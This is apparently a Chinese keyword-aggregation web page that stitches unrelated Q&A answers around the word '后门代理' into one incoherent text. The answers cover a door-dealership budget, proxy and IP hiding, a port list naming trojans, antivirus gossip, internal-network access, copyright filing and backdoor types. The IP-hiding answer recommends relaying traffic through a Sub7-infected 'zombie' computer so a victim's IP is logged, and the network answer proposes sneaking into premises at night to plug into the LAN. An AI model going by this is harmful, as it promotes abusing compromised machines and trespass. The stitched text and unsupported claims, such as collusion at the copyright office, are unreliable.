后门代理
① 做不锈钢门代理要投资多少钱
一间门抄面大约28平方以上,(地区间价格有差别)
一辆送货车,面包车要五菱微面以上,后门开口较大。(4万左右)
如果请工人要2名左右。(地区间有差别)
需要的电动工具有,切割机,磨机,冲击钻,抛光机,电批等。(建议用博士,全套10000以内。)
门面装修。(28平方左右,自己干1.8万吧)
代理费,金六福等比较出名的也没有代理费吧
上样板费,按产品市场价。(十个样板大约2万吧)
其余就是业务费用。
这样,你可以大约换算下是多少了。如果对营销有兴趣 网络八土路
② 如何开放自己的IP 做代理IP
通过软件也可以:安装CCProxy软件,使用WINGATE做代理
首先说说隐藏真实IP的方法,最简单的方法就是使用代理服务器。与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机和远程服务器之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后远端服务器包括其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。而且,这样还有一个好处,那就是如果有许多用户共用一个代理器时,当有人访问过某一站点后,所访问的内容便会保存在代理服务器的硬盘上,如果再有人访问该站点,这些内容便会直接从代理服务器中获取,而不必再次连接远端服务器,因此可以节约带宽,提高访问速度。
建议您最好用免费代理服务器,寻找免费代理服务器的方法有很多,你可以试试用ProxyHunter(代理猎手),它能自动为您搜索出多个免费代理服务器,并验证各个服务器的连接速度,从而让你选择最佳途径。更重要的是,代理服务器不仅支持浏览软件,而且支持电子邮件、FTP、下载、离线浏览等功能软件,可谓无所不在。【点击下载代理猎手 3.1】。不过这种方法比较费时、费事,建议不到万不得以时还是不用为好。最好的方法是使用现成的免费代理服务器,现在网上有不少网站定期提供最新的免费代理服务器,如这里提供的代理服务器的更新速度就非常快,而且各种类型的代理都有:http://www.emaga.net/8341/myann/index.asp 。建议大家把这个网页放入你的收藏夹,这样你就再也不用为找不到好的免费代理服务器而发愁了。
找到免费代理服务器后,就可以使用它了。以IE浏览器为例,运行IE,点击“工具”→“Interner选项”,在弹出的“Interner选项”对话框中选择“连接”标签,再点击“设置”按钮,在弹出的对话框中把“对此连接使用代理服务器”前面的框勾选上,然后在“地址”和“端口”栏中填入你找到的代理服务器IP和所用端口即可。
同时在“高级”设置中你还可以对不同的服务器,例如HTTP、FTP设定不同的代理服务器地址和端口。这样一来,当你再访问那些网页时,页面上显示的就不再是你的真实IP了。
不过,并不是所有的代理都不将你的真正的IP向目标地址上发送,假如你使用A4proxy之类的程序检测一些代理,发现http-ip-forward是存在的话,那证明该代理会把你的真正IP向目标地址发去,如果在一些聊天室中使用,会被高级别的人看到真正的IP。
另外,在代理中有HTTP和SOCKS代理之分,在SOCKS代理中又有SOCKS4和SOCKS5代理之分,SOCKS4和SOCKS5不同之处在于SOCKS5支持UDP这种协议,但SOCKS4是不支持的,所以在QQ上不可以使用SOCKS4代理,因为QQ使用的是UDP协议,但在ICQ上就可以使用SOCKS4或SOCKS5代理。
隐藏IP的另外一个方法是利用受控于你的电脑上的木马(也就是利用肉鸡),该电脑可以自由访问网络且不限于和你在一起(比方说单位或学校的电脑)。一些国外的木马如Sub7,具有“端口转向”功能,假设你想看xxx.com 这个网站的内容,而这个网站会记录访问者的IP,那么你可以这样做:假设受控电脑上有木马Sub7服务端程序在运行,请在自己的电脑上运行Sub7客户端,连接上那台电脑,使用端口转向的功能,在那台电脑上打开一个90端口,设定凡是从这个端口进去的数据都会转向到xxx.com 这个网站的80端口去(80端口是默认的www服务端口)。假设那个感染了Sub7的电脑的IP是202.202.202.202,那么只要在浏览器上输入http://202.202.202.202:90 ,就可以看到 xxx.com 这个网站的内容的了,而且那个网站记录下的访问的IP是202.202.202.202,不是我们真正的IP,这样就安全多了。
好了,现在你已经可以小小地“隐身”一把了,但还不够彻底,要想“隐形”还必须隐藏隐藏计算机名和工作组。因为网上有许多黑客软件可以查出你的计算机名和工作组,他们主要是通过搜索网上是否存在使用NetBIOS协议的用户,来探测其机器名称、IP地址等等信息,并借此来攻击你。
在Internet上,NetBIOS开放就和一个后门程序差不多。因为在你安装TCP/IP协议时,NetBIOS也被Windows作为默认设置载入了你的电脑,而电脑随即也具有了NetBIOS本身的开放性。换句话讲,在不知不觉间,你的上网电脑已被打开了一个危险的“后门”。这个后门可以泄漏你的信息:你的计算机名和工作组。事实上,有许多人会用自己的真实姓名做计算机名称,还有自己的单位名字作为工作组,这样很容易根据某个人的固定信息找到某个人的IP地址。而网上针对IP地址的攻击手段和工具实在是太多了,您说这是不是很危险呢?因此,如果你是一个单机用户那么完全可以禁止NetBIOS服务,从而睹上这个危险的“漏洞”。下面是解决办法:
1.Win9x用户
在Win9x下如果你是个拨号上网用户,就完全不需要登录到NT局域网络环境,只需要在“控制面板”→“网络”,删除“Microsoft网络用户”,使用“Microsoft友好登录”,另外也不要去设置“文件打印共享”就可以了。
2.WinNT用户
在WinNT下你可以取消NetBIOS与TCP/IP协议的绑定,方法是:“控制面板”→“网络”→“NetBIOS接口”→“WINS客户(TCP/IP)”,选择“禁用”,确定后重启。
3.Win2000或者WinXP用户
先用鼠标右键单击“网络邻居”,选择“属性”,进入“网络和拨号连接”,再用鼠标右键单击“本地连接”,选择“属性”,进入“本地连接属性”。双击“Internet 协议(TCP/IP)”后,点击“高级”,选择“选项”条中的“TCP/IP 筛选”,在“只允许”中填入除了139之外要用到的端口。注:如果你在局域网中,这样会影响局域网的使用。
下面再介绍一个对Win9x/NT/2000/XP用户都有效地办法:自己定制防火墙规则。以天网个人防火墙为例,选择一条空规则,规定如下规则:“数据包方向”选“接收”,“对方IP地址”选“任何”,“协议”选“TCP”,“本地端口”选“139到139”,“对方端口”选“0到0”,在“标志位”中选上“SYN标志”,“动作”选“拦截”,然后保存即可.
最后,我们再说说如何在QQ中隐形。之所以单独谈QQ,是由于QQ已经成为绝大多数网民上网的必备工具了。
QQ采用的是UDP数据包通讯,攻击者只要向你发送一个信息,他就可以通过监视UDP数据包来获得你的IP和QQ的端口号。从理论上说,在直接通讯的模式下,想避免攻击者发现你的IP地址是十分困难的。所以这里笔者介绍一种很常见的方法来避开对方知道你的QQ地址——使用代理服务器。通过代理服务器上QQ,就可以隐藏自己的真实IP,而攻击者所看到的IP只是代理服务的地址。隐身登录QQ后发送的消息是通过腾讯的服务器中转的,这样攻击者获取的IP也只是腾讯服务器的地址。
以最新的QQ2004为例,只要右键单击屏幕右下角的QQ图标,在弹出菜单中选择“系统参数”,单击“系统设置”中的“代理设置”,选中“使用自定义的网络设置”。在“类型”中选择“SOCK5代理服务器”在“服务器”和“端口”一栏中输入你寻找到的免费代理地址 “用户名”和“密码”一般不用填,点击“测试”按钮,如果你填入的代理地址有效,则会弹出“代理服务器工作正常”提示框,否则就会弹出“无法连接到代理服务器”的提示。上述步骤做完之后,最后点击“确定”即可。提供免费代理服务器的网站有很多,也可以自己用代理猎手等工具来查找。
如果没有找到合适的Sock5代理,还可以使用支持HTTP协议的QQ服务,实现QQ连通。有了这个功能,非会员也能够通过HTTP代理上线了。要想使用TCP方式登陆,只要在图四所示图中在“类型”中选择“HTTP代理服务器”。
然后输入服务器地址和端口(一般填80),这样,非会员也可通过HTTP代理上线了。之后你就可以通过HTTP代理使用QQ了,而网友们看到的则是你的假IP,这样就安全多了!
好了,现在就可以体验隐身冲浪带领的快感了,而且还安全了许多!真是一举两得。
③ 我是菜鸟,大家帮我看看这些端口是不是后门。*:*代表什么
入侵电脑端口
端口:0
服务:Reserved
说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
端口:1
服务:tcpmux
说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:21
服务:FTP
说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。
端口:22
服务:Ssh
说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。
端口:23
服务:Telnet
说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。
端口:25
服务:SMTP
说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。
端口:31
服务:MSG Authentication
说明:木马Master Paradise、Hackers Paradise开放此端口。
端口:42
服务:WINS Replication
说明:WINS复制
端口:53
服务:Domain Name Server(DNS)
说明:DNS服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其他的通信。因此防火墙常常过滤或记录此端口。
端口:67
服务:Bootstrap Protocol Server
说明:通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。客户端向68端口广播请求配置,服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
端口:69
服务:Trival File Transfer
说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。
端口:79
服务:Finger Server
说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其他机器Finger扫描。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:Metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
说明:消息传输代理。
端口:109
服务:Post Office Protocol -Version3
说明:POP3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。
端口:110
服务:SUN公司的RPC服务所有端口
说明:常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等
端口:113
服务:Authentication Service
说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。
端口:119
服务:Network News Transfer Protocol
说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。
端口:135
服务:Location Service
说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗?什么版本?还有些DOS攻击直接针对这个端口。
端口:137、138、139
服务:NETBIOS Name Service
说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。
端口:143
服务:Interim Mail Access Protocol v2
说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。
端口:161
服务:SNMP
说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。
端口:177
服务:X Display Manager Control Protocol
说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。
端口:389
服务:LDAP、ILS
说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
端口:443
服务:Https
说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。
端口:456
服务:[NULL]
说明:木马HACKERS PARADISE开放此端口。
端口:513
服务:Login,remote login
说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。
端口:544
服务:[NULL]
说明:kerberos kshell
端口:548
服务:Macintosh,File Services(AFP/IP)
说明:Macintosh,文件服务。
端口:553
服务:CORBA IIOP (UDP)
说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。
端口:555
服务:DSF
说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。
端口:568
服务:Membership DPA
说明:成员资格 DPA。
端口:569
服务:Membership MSN
说明:成员资格 MSN。
端口:635
服务:mountd
说明:Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于2049端口。
端口:636
服务:LDAP
说明:SSL(Secure Sockets layer)
端口:666
服务:Doom Id Software
说明:木马Attack FTP、Satanz Backdoor开放此端口
端口:993
服务:IMAP
说明:SSL(Secure Sockets layer)
端口:1001、1011
服务:[NULL]
说明:木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。
端口:1024
服务:Reserved
说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器,打开Telnet,再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。
端口:1025、1033
服务:1025:network blackjack 1033:[NULL]
说明:木马netspy开放这2个端口。
端口:1080
服务:SOCKS
说明:这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置,它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误,在加入IRC聊天室时常会看到这种情况。
端口:1170
服务:[NULL]
说明:木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。
端口:1234、1243、6711、6776
服务:[NULL]
说明:木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。
端口:1245
服务:[NULL]
说明:木马Vodoo开放此端口。
端口:1433
服务:SQL
说明:Microsoft的SQL服务开放的端口。
端口:1492
服务:stone-design-1
说明:木马FTP99CMP开放此端口。
端口:1500
服务:RPC client fixed port session queries
说明:RPC客户固定端口会话查询
端口:1503
服务:NetMeeting T.120
说明:NetMeeting T.120
端口:1524
服务:ingress
说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。
端口:1600
服务:issd
说明:木马Shivka-Burka开放此端口。
端口:1720
服务:NetMeeting
说明:NetMeeting H.233 call Setup。
端口:1731
服务:NetMeeting Audio Call Control
说明:NetMeeting音频调用控制。
端口:1807
服务:[NULL]
说明:木马SpySender开放此端口。
端口:1981
服务:[NULL]
说明:木马ShockRave开放此端口。
端口:1999
服务:cisco identification port
说明:木马BackDoor开放此端口。
端口:2000
服务:[NULL]
说明:木马GirlFriend 1.3、Millenium 1.0开放此端口。
端口:2001
服务:[NULL]
说明:木马Millenium 1.0、Trojan Cow开放此端口。
端口:2023
服务:xinuexpansion 4
说明:木马Pass Ripper开放此端口。
端口:2049
服务:NFS
说明:NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。
端口:2115
服务:[NULL]
说明:木马Bugs开放此端口。
端口:2140、3150
服务:[NULL]
说明:木马Deep Throat 1.0/3.0开放此端口。
端口:2500
服务:RPC client using a fixed port session replication
说明:应用固定端口会话复制的RPC客户
端口:2583
服务:[NULL]
说明:木马Wincrash 2.0开放此端口。
端口:2801
服务:[NULL]
说明:木马Phineas Phucker开放此端口。
端口:3024、4092
服务:[NULL]
说明:木马WinCrash开放此端口。
端口:3128
服务:squid
说明:这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。
端口:3129
服务:[NULL]
说明:木马Master Paradise开放此端口。
端口:3150
服务:[NULL]
说明:木马The Invasor开放此端口。
端口:3210、4321
服务:[NULL]
说明:木马SchoolBus开放此端口
端口:3333
服务:dec-notes
说明:木马Prosiak开放此端口
端口:3389
服务:超级终端
说明:WINDOWS 2000终端开放此端口。
端口:3700
服务:[NULL]
说明:木马Portal of Doom开放此端口
端口:3996、4060
服务:[NULL]
说明:木马RemoteAnything开放此端口
端口:4000
服务:QQ客户端
说明:腾讯QQ客户端开放此端口。
端口:4092
服务:[NULL]
说明:木马WinCrash开放此端口。
端口:4590
服务:[NULL]
说明:木马ICQTrojan开放此端口。
端口:5000、5001、5321、50505
服务:[NULL]
说明:木马blazer5开放5000端口。木马Sockets de Troie开放5000、5001、5321、50505端口。
端口:5400、5401、5402
服务:[NULL]
说明:木马Blade Runner开放此端口。
端口:5550
服务:[NULL]
说明:木马xtcp开放此端口。
端口:5569
服务:[NULL]
说明:木马Robo-Hack开放此端口。
端口:5632
服务:pcAnywere
说明:有时会看到很多这个端口的扫描,这依赖于用户所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能的代理(这里的代理是指agent而不是proxy)。入侵者也会寻找开放这种服务的计算机。,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。
端口:5742
服务:[NULL]
说明:木马WinCrash1.03开放此端口。
端口:6267
服务:[NULL]
说明:木马广外女生开放此端口。
端口:6400
服务:[NULL]
说明:木马The tHing开放此端口。
端口:6670、6671
服务:[NULL]
说明:木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。
端口:6883
服务:[NULL]
说明:木马DeltaSource开放此端口。
端口:6969
服务:[NULL]
说明:木马Gatecrasher、Priority开放此端口。
端口:6970
服务:RealAudio
说明:RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。
端口:7000
服务:[NULL]
说明:木马Remote Grab开放此端口。
端口:7300、7301、7306、7307、7308
服务:[NULL]
说明:木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。
端口:7323
服务:[NULL]
说明:Sygate服务器端。
端口:7626
服务:[NULL]
说明:木马Giscier开放此端口。
端口:7789
服务:[NULL]
说明:木马ICKiller开放此端口。
端口:8000
服务:OICQ
说明:腾讯QQ服务器端开放此端口。
端口:8010
服务:Wingate
说明:Wingate代理开放此端口。
端口:8080
服务:代理端口
说明:WWW代理开放此端口。
端口:9400、9401、9402
服务:[NULL]
说明:木马Incommand 1.0开放此端口。
端口:9872、9873、9874、9875、10067、10167
服务:[NULL]
说明:木马Portal of Doom开放此端口。
端口:9989
服务:[NULL]
说明:木马iNi-Killer开放此端口。
端口:11000
服务:[NULL]
说明:木马SennaSpy开放此端口。
端口:11223
服务:[NULL]
说明:木马Progenic trojan开放此端口。
端口:12076、61466
服务:[NULL]
说明:木马Telecommando开放此端口。
端口:12223
服务:[NULL]
说明:木马Hack'99 KeyLogger开放此端口。
端口:12345、12346
服务:[NULL]
说明:木马NetBus1.60/1.70、GabanBus开放此端口。
端口:12361
服务:[NULL]
说明:木马Whack-a-mole开放此端口。
端口:13223
服务:PowWow
说明:PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。
端口:16969
服务:[NULL]
说明:木马Priority开放此端口。
端口:17027
服务:Concent
说明:这是一个外向连接。这是由于公司内部有人安装了带有Concent"adbot"的共享软件。Concent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。
端口:19191
服务:[NULL]
说明:木马蓝色火焰开放此端口。
端口:20000、20001
服务:[NULL]
说明:木马Millennium开放此端口。
端口:20034
服务:[NULL]
说明:木马NetBus Pro开放此端口。
端口:21554
服务:[NULL]
说明:木马GirlFriend开放此端口。
端口:22222
服务:[NULL]
说明:木马Prosiak开放此端口。
端口:23456
服务:[NULL]
说明:木马Evil FTP、Ugly FTP开放此端口。
端口:26274、47262
服务:[NULL]
说明:木马Delta开放此端口。
端口:27374
服务:[NULL]
说明:木马Subseven 2.1开放此端口。
端口:30100
服务:[NULL]
说明:木马NetSphere开放此端口。
端口:30303
服务:[NULL]
说明:木马Socket23开放此端口。
端口:30999
服务:[NULL]
说明:木马Kuang开放此端口。
端口:31337、31338
服务:[NULL]
说明:木马BO(Back Orifice)开放此端口。另外木马DeepBO也开放31338端口。
端口:31339
服务:[NULL]
说明:木马NetSpy DK开放此端口。
端口:31666
服务:[NULL]
说明:木马BOWhack开放此端口。
端口:33333
服务:[NULL]
说明:木马Prosiak开放此端口。
端口:34324
服务:[NULL]
说明:木马Tiny Telnet Server、BigGluck、TN开放此端口。
端口:40412
服务:[NULL]
说明:木马The Spy开放此端口。
端口:40421、40422、40423、40426、
服务:[NULL]
说明:木马Masters Paradise开放此端口。
端口:43210、54321
服务:[NULL]
说明:木马SchoolBus 1.0/2.0开放此端口。
端口:44445
服务:[NULL]
说明:木马Happypig开放此端口。
端口:50766
服务:[NULL]
说明:木马Fore开放此端口。
端口:53001
服务:[NULL]
说明:木马Remote Windows Shutdown开放此端口。
端口:65000
服务:[NULL]
说明:木马Devil 1.03开放此端口。
端口:88
说明:Kerberos krb5。另外TCP的88端口也是这个用途。
端口:137
说明:SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。
端口:161
说明:Simple Network Management Protocol(SMTP)(简单网络管理协议)。
端口:162
说明:SNMP Trap(SNMP陷阱)
端口:445
说明:Common Internet File System(CIFS)(公共Internet文件系统)
端口:464
说明:Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。
端口:500
说明:Internet Key Exchange(IKE)(Internet密钥交换)
端口:1645、1812
说明:Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(远程认证拨号用户服务)
端口:1646、1813
说明:RADIUS accounting(Routing and Remote Access)(RADIUS记帐(路由和远程访问))
端口:1701
说明:Layer Two Tunneling Protocol(L2TP)(第2层隧道协议)
端口:1801、3527
说明:Microsoft Message Queue Server(Microsoft消息队列服务器)。还有TCP的135、1801、2101、2103、2105也是同样的用途。
端口:2504
说明:Network Load Balancing(网络平衡负荷)
④ 360那些后门会出现在他们代理的杀毒软件上吗
其实我觉得吧偷窥不偷窥的无所谓了
事实是如何只有他们自己专清楚
360说QQ偷窥 他自己有没有偷窥你能确定吗属?
腾讯昨天作出那个决定也是迫不得已
毕竟360实在做得过分了。
我以前也装了360的,看到过提示,直接对腾讯进行人身攻击
把我逼急了我也做和腾讯一样的事情。
当然如果不是出了昨天的事情我也不会卸载360,
以前和我室友去修电脑,修电脑的人都特别提醒过不能安装360(我现在在新加坡的,试问一个国外的修电脑的怎么还对360有这么大意见?)
那个时候我朋友就没装了,我电脑上也没卸载掉 就一直放着。
后来想安装许多软件都不行。
还有一个问题,那些安装软件的程序都提示的不在有360的电脑上进行安装,难道他们也来偷窥隐私的?= =
不多说了 仅为我对360的看法
⑤ ip代理的用法
1、此内部网络有你认识的人,你可以在他的配合下使用一些远程工具,如QQ的远程连接访版问;
2、你是此内权部网络的网络管理人员,可以配置相应的服务器后门访问,比如说你可以开放服务器的远程连接至公网,如mstsc
3、你是此内部网络的管理人员,你可以在此内部网络与外部网络的防火强上配置vpn,通过vpn拨号进入此网络,vpn的产品很多,常见如cisco vpn 客户端
4、你深夜潜入此内部网络的所在地,使用RJ45的网线接入此网络内,条件为:RJ45网线1根,笔记本电脑1台(建议小而轻,避免太重太大被人发现)
⑥ 软著申请为什么只有代理能办加急
软件著作权申请来可以个人源办理软件著作权申请加急,不仅仅是代理能办加急,个人也可以办理申请软件著作权加急。但是,常见的是代理加急这种说法。原因在于,一般来说,如果本人去申请,著
作权中心机构他们审阅,大概30个工作日他们才会审阅你的(甚至更长时间),所以申请下来可能1个月时间(算很快),2个月,甚至半年,而且还不一定过,这样很费时间和精力。但是这些代理公司他
们和著作权中心是有隐晦的合作关系的,再加上,代理能加急是因为对各方面业务都非常的熟悉了,不会出现差错,所以他们会给你加急审阅,而且审核力度比较松,就是因为这样,代理公司才能这么火爆,很多人都会选择代理申请,这样个人申请加急的说法就渐渐不成文。
(6)后门代理扩展阅读
申请软件著作权登记的,应当提交以下主要证明文件:
(一)自然人、法人或者其他组织的身份证明;
(二)有著作权归属书面合同或者项目任务书的,应当提交合同或者项目任务书;
(三)经原软件著作权人许可,在原有软件上开发的软件,应当提交原著作权人的许可证明;
(四)权利继承人、受让人或者承受人,提交权利继承、受让或者承受的证明。
参考资料
网络-软件著作权
⑦ 美国签证如何找关系 找后门
如果你只是留学的话,去美国吧 ,国内还是比较认的!如果是移民的话,建议你移民到加拿大,不是说美国不好,而是相对而言,加拿大福利更好,人权更有保证!生活压力也会比美国小很多!
⑧ 卡瘦是不是传销,有做过代理的嘛
卡瘦棒是不是传销,建议你拨打110报案或者求助,请求公安机关的人民警察协助进行辨别或者求证。公安机关的调查结论最具权威。报案后,公安机关立案后就会展开侦查,如确系骗子,公安机关会抓获犯罪嫌疑人,给予其法律制裁。
拓展资料:
1、简介
传销是指组织者发展人员,通过对被发展人员以其直接或者间接发展的人员数量或者业绩为依据计算和给付报酬,或者要求被发展人员以交纳一定费用为条件取得加入资格等方式获得财富的违法行为。传销的本质是"庞氏骗局",即以后来者的钱发前面人的收益。
2、发展形成
传销产生于二战后期的美国,成型于战后的日本,发展于中国。传销培训教材不仅极富煽动性和欺骗性,而且具有很多心理学的要素,极易诱人上当。在国外传销和直销是一个意思,也就是说国外只有传销这一个概念,国外传销的主要概念是:以顾客使用产品产生的口碑作为动力,让顾客来帮助经销商来宣传产品后分享一部分利润,也就是客户传播式销售。这跟国内的传销是两个概念。
3、主体要件
本罪主体是一般主体,凡达到法定刑事责任年龄、具有刑事责任能力的自然人均能构成本罪。本罪追究的主要是传销的组织策划者。多次介绍、诱骗、胁迫他人加入传销组织的积极参与者。对一般参加者,则不予追究。
⑨ 后门程序的分类
后门可以按照很多方式来分类,标准不同自然分类就不同,为了便于大家理解,我们从技术方面来考虑后门程序的分类方法: 此类后门程序一般都是服务器上正常 的web服务来构造自己的连接方式,比如非常流行的ASP、cgi脚本后门等。
网页后门,网络上针对系统漏洞的攻击事件渐渐少了,因为大家在认识到网络安全的重要性之后,最简单却又最有效的防护办法:升级,都被大家所认同,所以系统漏洞在以后的岁月中存活的周期会越来越短,而从最近的趋势来看,脚本漏洞已经渐渐取代了系统漏洞的地位,非常多的人开始研究起脚本漏洞来,sql注入也开始成为各大安全站点首要关注热点,找到提升权限的突破口,进而拿到服务器的系统权限。
asp、CGI、PHP这三个脚本大类在网络上的普遍运用带来了脚本后门在这三方面的发展。
线程插入后门
利用系统自身的某个服务或者线程,将后门程序插入到其中,具体原理原来《黑客防线》曾具体讲解过,感兴趣的朋友可以查阅。这也是现在最流行的一个后门技术。
扩展后门
